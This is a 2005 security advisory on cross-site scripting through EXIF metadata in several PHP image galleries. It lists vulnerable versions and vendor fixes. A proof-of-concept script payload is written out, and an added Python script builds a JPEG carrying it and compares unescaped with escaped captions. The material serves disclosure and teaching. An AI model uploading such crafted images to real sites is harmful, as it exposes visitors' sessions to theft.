
PHP Image Galleries EXIF Metadata XSS Multiple Vulnerabilities
Monday, 05 September 2005
Summary
Most PHP-based image galleries now parse the Exchangeable Image File (EXIF) header of JPEG files. EXIF is an international specification that lets imaging companies encode metadata in the headers (application segments) of a JPEG file. Unfortunately, the metadata read from the EXIF header is not sanitized before being displayed, so an attacker who can upload an image controls text that is written straight into the gallery's HTML.
Credit:
The information has been provided by Cedric Cochin .
The original article can be found at: http://cedri.cc/advisories/EXIF_XSS.txt

Details
Vulnerable Systems:
* Coppermine version 1.3.3 and prior
* Gallery version 1.5.1-RC2 and prior
* phpGraphy version 0.9.9a and prior
* YaPig version 0.95 and prior

Immune Systems:
* Coppermine version 1.4.1
* phpGraphy version 0.9.10

Embedding malicious content in the EXIF section of a JPEG image allows an attacker to perform a cross-site scripting attack when one of the affected PHP galleries displays the image's EXIF metadata alongside the image.

Proof of Concept:
Take a .JPG file, edit its EXIF section and replace the content of a text field with
<script>alert(document.cookie)</script>
then upload the image to an online gallery and make the gallery display it. If the gallery writes EXIF fields into the page without HTML-escaping them, the script executes in the browser of every visitor who views the image.
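The following script shows the whole chain described above in working code: it builds a JPEG whose EXIF ImageDescription tag carries the advisory's payload, reads the tag back the way a gallery's EXIF reader would (both TIFF byte orders), and compares the unescaped caption the affected galleries produced with the HTML-escaped one the fixes produce. This is an added example, not code from the advisory or from any of the galleries named in it; the render_* functions are hypothetical stand-ins for a gallery's caption template, and the JPEG is constructed in memory with no image data.

```python
"""Build a JPEG whose EXIF ImageDescription carries the advisory's XSS payload,
read it back the way a gallery's EXIF reader would, and compare raw output
with HTML-escaped output. Added example, not code from the advisory or any
of the galleries named in it; the render_* functions are hypothetical
stand-ins for a gallery's caption template."""
import html
import struct

PAYLOAD = "<script>alert(document.cookie)</script>"  # payload from the advisory's PoC

TAG_IMAGE_DESCRIPTION = 0x010E  # standard EXIF/TIFF tag, ASCII type
TYPE_ASCII = 2


def build_exif_jpeg(description: str, little_endian: bool = True) -> bytes:
    """Return a minimal JPEG: SOI, one APP1 'Exif' segment, EOI.
    It has no scan data, so it satisfies a metadata parser but is not viewable."""
    e = "<" if little_endian else ">"
    desc = description.encode("ascii") + b"\x00"  # ASCII values are NUL-terminated
    # TIFF header: byte-order mark, magic 42, offset of IFD0 (8 = right after header)
    tiff = (b"II" if little_endian else b"MM") + struct.pack(e + "HI", 42, 8)
    # IFD0 = entry count (2) + one 12-byte entry + next-IFD pointer (4); the
    # description exceeds 4 bytes, so it is stored after the IFD at offset 26
    value_offset = 8 + 2 + 12 + 4
    ifd = struct.pack(e + "H", 1)
    ifd += struct.pack(e + "HHII", TAG_IMAGE_DESCRIPTION, TYPE_ASCII, len(desc), value_offset)
    ifd += struct.pack(e + "I", 0)  # no next IFD
    app1_body = b"Exif\x00\x00" + tiff + ifd + desc
    # a JPEG segment length counts its own two bytes but not the marker
    app1 = b"\xff\xe1" + struct.pack(">H", len(app1_body) + 2) + app1_body
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def _parse_ifd0_ascii(tiff: bytes) -> dict:
    """Return the ASCII-typed tags of IFD0 as {tag_id: str}."""
    order = tiff[:2]
    if order == b"II":
        e = "<"
    elif order == b"MM":
        e = ">"
    else:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd_off = struct.unpack(e + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(e + "H", tiff[ifd_off:ifd_off + 2])
    tags = {}
    for i in range(count):
        entry = tiff[ifd_off + 2 + 12 * i: ifd_off + 14 + 12 * i]
        tag, typ, n, val = struct.unpack(e + "HHII", entry)
        if typ != TYPE_ASCII:
            continue
        # values of 4 bytes or less live inline in the value field
        raw = entry[8:8 + n] if n <= 4 else tiff[val:val + n]
        tags[tag] = raw.split(b"\x00", 1)[0].decode("latin-1")
    return tags


def read_exif_ascii_tags(jpeg: bytes) -> dict:
    """Walk the JPEG segments, find the Exif APP1 segment and parse its IFD0."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 2 <= len(jpeg):
        (marker,) = struct.unpack(">H", jpeg[pos:pos + 2])
        if marker in (0xFFD9, 0xFFDA):  # EOI or SOS: no more metadata segments
            break
        (seglen,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        body = jpeg[pos + 4:pos + 2 + seglen]
        pos += 2 + seglen
        if marker == 0xFFE1 and body.startswith(b"Exif\x00\x00"):
            return _parse_ifd0_ascii(body[6:])
    return {}


def render_caption_vulnerable(description: str) -> str:
    """What the affected galleries did: interpolate metadata straight into HTML."""
    return f'<div class="caption">{description}</div>'


def render_caption_safe(description: str) -> str:
    """The fix: HTML-escape metadata before output ('sanitize before display')."""
    return f'<div class="caption">{html.escape(description, quote=True)}</div>'


if __name__ == "__main__":
    desc = read_exif_ascii_tags(build_exif_jpeg(PAYLOAD))[TAG_IMAGE_DESCRIPTION]
    print(render_caption_vulnerable(desc))  # script tag reaches the browser
    print(render_caption_safe(desc))        # rendered as inert text
```

The escaping belongs at the output stage, not at upload time: EXIF can be re-read from the stored file later, other tags (UserComment, Artist, Copyright, and maker notes) carry the same attacker-controlled bytes, and a gallery that strips `<script>` on upload but echoes other fields or other encodings is still exploitable.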

Vendor Status:
The information was provided to all of the affected projects' maintainers on 17 August 2005.

* Coppermine
Update to Coppermine pg1.3.4 http://coppermine-gallery.net/forum/index.php?topic=20933.0

* Gallery
Update to the final release of Gallery 1.5.1. http://gallery.menalto.com/modules.php?op=modload&name=phpWiki&file=index&pagename=Download
A patch for Gallery 1.5 and a new Debian package of Gallery 1.2.5 have been released as well.

* phpGraphy
Update to version 0.9.10 http://phpgraphy.sourceforge.net/download.php

* YaPig
No response received so far.

* PhotoPost PHP Pro
On 22 August 2005: "we'll be issuing an update to PhotoPost today which will sanitize this data before being displayed"
